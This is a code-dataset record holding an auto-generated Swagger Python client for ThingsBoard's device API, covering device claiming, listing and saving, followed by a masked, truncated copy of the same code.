code
stringlengths
13
1.2M
order_type
stringclasses
1 value
original_example
dict
step_ids
listlengths
1
5
# coding: utf-8 # Copyright 2020. ThingsBoard # # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # http://www.apache.org/licenses/LICENSE-2.0 # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from tb_rest_client.api.api_ce import DeviceControllerApi class DeviceControllerApi(DeviceControllerApi): """NOTE: This class is auto generated by the swagger code generator program. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): super(DeviceControllerApi, self).__init__(api_client) def claim_device_using_post(self, device_name, **kwargs): # noqa: E501 """claimDevice # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.claim_device_using_post(device_name, async_req=True) >>> result = thread.get() :param async_req bool :param str device_name: deviceName (required) :param ClaimRequest claim_request: claimRequest :param str sub_customer_id: subCustomerId :return: DeferredResultResponseEntity If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501 else: (data) = self.claim_device_using_post_with_http_info(device_name, **kwargs) # noqa: E501 return data def claim_device_using_post_with_http_info(self, device_name, **kwargs): # noqa: E501 """claimDevice # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True) >>> result = thread.get() :param async_req bool :param str device_name: deviceName (required) :param ClaimRequest claim_request: claimRequest :param str sub_customer_id: subCustomerId :return: DeferredResultResponseEntity If the method is called asynchronously, returns the request thread. """ all_params = ['device_name', 'claim_request', 'sub_customer_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'device_name' is set if ('device_name' not in params or params['device_name'] is None): raise ValueError("Missing the required parameter `device_name` when calling `claim_device_using_post`") # noqa: E501 collection_formats = {} path_params = {} if 'device_name' in params: path_params['deviceName'] = params['device_name'] # noqa: E501 query_params = [] if 'sub_customer_id' in params: query_params.append(('subCustomerId', params['sub_customer_id'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None if 'claim_request' in params: body_params = params['claim_request'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/customer/device/{deviceName}/claim{?subCustomerId}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='DeferredResultResponseEntity', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_customer_devices_using_get(self, customer_id, page_size, page, **kwargs): # noqa: E501 """getCustomerDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_customer_devices_using_get(customer_id, page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str customer_id: customerId (required) :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501 else: (data) = self.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, **kwargs) # noqa: E501 return data def get_customer_devices_using_get_with_http_info(self, customer_id, page_size, page, **kwargs): # noqa: E501 """getCustomerDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str customer_id: customerId (required) :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ all_params = ['customer_id', 'page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'customer_id' is set if ('customer_id' not in params or params['customer_id'] is None): raise ValueError("Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`") # noqa: E501 # verify the required parameter 'page_size' is set if ('page_size' not in params or params['page_size'] is None): raise ValueError("Missing the required parameter `page_size` when calling `get_customer_devices_using_get`") # noqa: E501 # verify the required parameter 'page' is set if ('page' not in params or params['page'] is None): raise ValueError("Missing the required parameter `page` when calling `get_customer_devices_using_get`") # noqa: E501 collection_formats = {} path_params = {} if 'customer_id' in params: path_params['customerId'] = params['customer_id'] # noqa: E501 query_params = [] if 'type' in params: query_params.append(('type', params['type'])) # noqa: E501 if 'text_search' in params: query_params.append(('textSearch', params['text_search'])) # noqa: E501 if 'sort_property' in params: query_params.append(('sortProperty', params['sort_property'])) # noqa: E501 if 'sort_order' in params: query_params.append(('sortOrder', params['sort_order'])) # noqa: E501 if 'page_size' in params: query_params.append(('pageSize', params['page_size'])) # noqa: E501 if 'page' in params: query_params.append(('page', params['page'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='PageDataDevice', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_devices_by_entity_group_id_using_get(self, entity_group_id, page_size, page, **kwargs): # noqa: E501 """getDevicesByEntityGroupId # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str entity_group_id: entityGroupId (required) :param str page_size: Page size (required) :param str page: Page (required) :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501 else: (data) = self.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, **kwargs) # noqa: E501 return data def get_devices_by_entity_group_id_using_get_with_http_info(self, entity_group_id, page_size, page, **kwargs): # noqa: E501 """getDevicesByEntityGroupId # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str entity_group_id: entityGroupId (required) :param str page_size: Page size (required) :param str page: Page (required) :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ all_params = ['entity_group_id', 'page_size', 'page', 'text_search', 'sort_property', 'sort_order'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'entity_group_id' is set if ('entity_group_id' not in params or params['entity_group_id'] is None): raise ValueError("Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501 # verify the required parameter 'page_size' is set if ('page_size' not in params or params['page_size'] is None): raise ValueError("Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501 # verify the required parameter 'page' is set if ('page' not in params or params['page'] is None): raise ValueError("Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`") # noqa: E501 if 'page_size' in params and params['page_size'] < 1.0: # noqa: E501 raise ValueError("Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`") # noqa: E501 if 'page' in params and params['page'] < 0.0: # noqa: E501 raise ValueError("Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`") # noqa: E501 collection_formats = {} path_params = {} if 'entity_group_id' in params: path_params['entityGroupId'] = params['entity_group_id'] # noqa: E501 query_params = [] if 'text_search' in params: query_params.append(('textSearch', params['text_search'])) # noqa: E501 if 'sort_property' in params: query_params.append(('sortProperty', params['sort_property'])) # noqa: E501 if 'sort_order' in params: query_params.append(('sortOrder', params['sort_order'])) # noqa: E501 if 'page_size' in params: query_params.append(('pageSize', params['page_size'])) # noqa: E501 if 'page' in params: query_params.append(('page', params['page'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='PageDataDevice', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_tenant_devices_using_get(self, page_size, page, **kwargs): # noqa: E501 """getTenantDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501 else: (data) = self.get_tenant_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501 return data def get_tenant_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501 """getTenantDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'page_size' is set if ('page_size' not in params or params['page_size'] is None): raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_devices_using_get`") # noqa: E501 # verify the required parameter 'page' is set if ('page' not in params or params['page'] is None): raise ValueError("Missing the required parameter `page` when calling `get_tenant_devices_using_get`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'type' in params: query_params.append(('type', params['type'])) # noqa: E501 if 'text_search' in params: query_params.append(('textSearch', params['text_search'])) # noqa: E501 if 'sort_property' in params: query_params.append(('sortProperty', params['sort_property'])) # noqa: E501 if 'sort_order' in params: query_params.append(('sortOrder', params['sort_order'])) # noqa: E501 if 'page_size' in params: query_params.append(('pageSize', params['page_size'])) # noqa: E501 if 'page' in params: query_params.append(('page', params['page'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/tenant/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='PageDataDevice', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_user_devices_using_get(self, page_size, page, **kwargs): # noqa: E501 """getUserDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_user_devices_using_get(page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501 else: (data) = self.get_user_devices_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501 return data def get_user_devices_using_get_with_http_info(self, page_size, page, **kwargs): # noqa: E501 """getUserDevices # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.get_user_devices_using_get_with_http_info(page_size, page, async_req=True) >>> result = thread.get() :param async_req bool :param str page_size: pageSize (required) :param str page: page (required) :param str type: type :param str text_search: textSearch :param str sort_property: sortProperty :param str sort_order: sortOrder :return: PageDataDevice If the method is called asynchronously, returns the request thread. """ all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'page_size' is set if ('page_size' not in params or params['page_size'] is None): raise ValueError("Missing the required parameter `page_size` when calling `get_user_devices_using_get`") # noqa: E501 # verify the required parameter 'page' is set if ('page' not in params or params['page'] is None): raise ValueError("Missing the required parameter `page` when calling `get_user_devices_using_get`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'type' in params: query_params.append(('type', params['type'])) # noqa: E501 if 'text_search' in params: query_params.append(('textSearch', params['text_search'])) # noqa: E501 if 'sort_property' in params: query_params.append(('sortProperty', params['sort_property'])) # noqa: E501 if 'sort_order' in params: query_params.append(('sortOrder', params['sort_order'])) # noqa: E501 if 'page_size' in params: query_params.append(('pageSize', params['page_size'])) # noqa: E501 if 'page' in params: query_params.append(('page', params['page'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/user/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='PageDataDevice', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def save_device_using_post(self, device, **kwargs): # noqa: E501 """saveDevice # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.save_device_using_post(device, async_req=True) >>> result = thread.get() :param async_req bool :param Device device: device (required) :param str access_token: accessToken :param str entity_group_id: entityGroupId :return: Device If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501 else: (data) = self.save_device_using_post_with_http_info(device, **kwargs) # noqa: E501 return data def save_device_using_post_with_http_info(self, device, **kwargs): # noqa: E501 """saveDevice # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api_pe.save_device_using_post_with_http_info(device, async_req=True) >>> result = thread.get() :param async_req bool :param Device device: device (required) :param str access_token: accessToken :param str entity_group_id: entityGroupId :return: Device If the method is called asynchronously, returns the request thread. """ all_params = ['device', 'access_token', 'entity_group_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): params[key] = val del params['kwargs'] # verify the required parameter 'device' is set if ('device' not in params or params['device'] is None): raise ValueError("Missing the required parameter `device` when calling `save_device_using_post`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] if 'access_token' in params: query_params.append(('accessToken', params['access_token'])) # noqa: E501 if 'entity_group_id' in params: query_params.append(('entityGroupId', params['entity_group_id'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None if 'device' in params: body_params = params['device'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['*/*']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['X-Authorization'] # noqa: E501 return self.api_client.call_api( '/api/device{?accessToken,entityGroupId}', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='Device', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
normal
{ "blob_id": "9b30075183cf9611307afa74aa45979872e7e9d5", "index": 8132, "step-1": "<mask token>\n\n\nclass DeviceControllerApi(DeviceControllerApi):\n <mask token>\n <mask token>\n\n def claim_device_using_post(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n else:\n data = self.claim_device_using_post_with_http_info(device_name,\n **kwargs)\n return data\n\n def claim_device_using_post_with_http_info(self, device_name, **kwargs):\n \"\"\"claimDevice # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.claim_device_using_post_with_http_info(device_name, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str device_name: deviceName (required)\n :param ClaimRequest claim_request: claimRequest\n :param str sub_customer_id: subCustomerId\n :return: DeferredResultResponseEntity\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['device_name', 'claim_request', 'sub_customer_id']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'device_name' not in params or params['device_name'] is None:\n raise ValueError(\n 'Missing the required parameter `device_name` when calling `claim_device_using_post`'\n )\n collection_formats = {}\n path_params = {}\n if 'device_name' in params:\n path_params['deviceName'] = params['device_name']\n query_params = []\n if 'sub_customer_id' in params:\n query_params.append(('subCustomerId', params['sub_customer_id']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n if 'claim_request' in params:\n body_params = params['claim_request']\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/device/{deviceName}/claim{?subCustomerId}',\n 'POST', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='DeferredResultResponseEntity', auth_settings=\n auth_settings, async_req=params.get('async_req'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)\n <mask token>\n\n def get_customer_devices_using_get_with_http_info(self, customer_id,\n page_size, page, **kwargs):\n \"\"\"getCustomerDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_customer_devices_using_get_with_http_info(customer_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str customer_id: customerId (required)\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['customer_id', 'page_size', 'page', 'type',\n 'text_search', 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'customer_id' not in params or params['customer_id'] is None:\n raise ValueError(\n 'Missing the required parameter `customer_id` when calling `get_customer_devices_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_customer_devices_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_customer_devices_using_get`'\n )\n collection_formats = {}\n path_params = {}\n if 'customer_id' in params:\n path_params['customerId'] = params['customer_id']\n query_params = []\n if 'type' in params:\n query_params.append(('type', params['type']))\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/customer/{customerId}/devices{?type,textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_devices_by_entity_group_id_using_get(self, entity_group_id,\n page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n else:\n data = (self.\n get_devices_by_entity_group_id_using_get_with_http_info(\n entity_group_id, page_size, page, **kwargs))\n return data\n\n def get_devices_by_entity_group_id_using_get_with_http_info(self,\n entity_group_id, page_size, page, **kwargs):\n \"\"\"getDevicesByEntityGroupId # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_devices_by_entity_group_id_using_get_with_http_info(entity_group_id, page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str entity_group_id: entityGroupId (required)\n :param str page_size: Page size (required)\n :param str page: Page (required)\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['entity_group_id', 'page_size', 'page', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'entity_group_id' not in params or params['entity_group_id'\n ] is None:\n raise ValueError(\n 'Missing the required parameter `entity_group_id` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the required parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page' not in params or params['page'] is None:\n raise ValueError(\n 'Missing the required parameter `page` when calling `get_devices_by_entity_group_id_using_get`'\n )\n if 'page_size' in params and params['page_size'] < 1.0:\n raise ValueError(\n 'Invalid value for parameter `page_size` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `1.0`'\n )\n if 'page' in params and params['page'] < 0.0:\n raise ValueError(\n 'Invalid value for parameter `page` when calling `get_devices_by_entity_group_id_using_get`, must be a value greater than or equal to `0.0`'\n )\n collection_formats = {}\n path_params = {}\n if 'entity_group_id' in params:\n path_params['entityGroupId'] = params['entity_group_id']\n query_params = []\n if 'text_search' in params:\n query_params.append(('textSearch', params['text_search']))\n if 'sort_property' in params:\n query_params.append(('sortProperty', params['sort_property']))\n if 'sort_order' in params:\n query_params.append(('sortOrder', params['sort_order']))\n if 'page_size' in params:\n query_params.append(('pageSize', params['page_size']))\n if 'page' in params:\n query_params.append(('page', params['page']))\n header_params = {}\n form_params = []\n local_var_files = {}\n body_params = None\n header_params['Accept'] = self.api_client.select_header_accept(['*/*'])\n header_params['Content-Type'\n ] = self.api_client.select_header_content_type(['application/json']\n )\n auth_settings = ['X-Authorization']\n return self.api_client.call_api(\n '/api/entityGroup/{entityGroupId}/devices{?textSearch,sortProperty,sortOrder,pageSize,page}'\n , 'GET', path_params, query_params, header_params, body=\n body_params, post_params=form_params, files=local_var_files,\n response_type='PageDataDevice', auth_settings=auth_settings,\n async_req=params.get('async_req'), _return_http_data_only=\n params.get('_return_http_data_only'), _preload_content=params.\n get('_preload_content', True), _request_timeout=params.get(\n '_request_timeout'), collection_formats=collection_formats)\n\n def get_tenant_devices_using_get(self, page_size, page, **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n kwargs['_return_http_data_only'] = True\n if kwargs.get('async_req'):\n return self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n else:\n data = self.get_tenant_devices_using_get_with_http_info(page_size,\n page, **kwargs)\n return data\n\n def get_tenant_devices_using_get_with_http_info(self, page_size, page,\n **kwargs):\n \"\"\"getTenantDevices # noqa: E501\n\n This method makes a synchronous HTTP request by default. To make an\n asynchronous HTTP request, please pass async_req=True\n >>> thread = api_pe.get_tenant_devices_using_get_with_http_info(page_size, page, async_req=True)\n >>> result = thread.get()\n\n :param async_req bool\n :param str page_size: pageSize (required)\n :param str page: page (required)\n :param str type: type\n :param str text_search: textSearch\n :param str sort_property: sortProperty\n :param str sort_order: sortOrder\n :return: PageDataDevice\n If the method is called asynchronously,\n returns the request thread.\n \"\"\"\n all_params = ['page_size', 'page', 'type', 'text_search',\n 'sort_property', 'sort_order']\n all_params.append('async_req')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n if 'page_size' not in params or params['page_size'] is None:\n raise ValueError(\n 'Missing the 